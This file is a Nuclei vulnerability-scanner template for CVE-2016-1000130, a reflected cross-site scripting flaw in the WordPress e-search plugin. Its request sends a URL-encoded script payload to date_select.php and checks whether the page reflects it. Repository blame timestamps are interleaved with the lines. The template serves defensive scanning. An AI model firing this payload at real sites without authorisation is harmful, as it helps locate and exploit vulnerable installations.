my-nuclei-templates/CVE-2016-1000130.yaml

39 lines
1.0 KiB
YAML
Raw Normal View History

2021-07-20 23:36:53 +00:00
id: CVE-2016-1000130
info:
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin e-search v1.0
2022-06-18 08:05:25 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
- https://wordpress.org/plugins/e-search
- http://www.vapidlabs.com/wp/wp_advisory.php?v=394
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2016-1000130
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2016,wordpress,xss,wp-plugin
2021-07-20 23:36:53 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200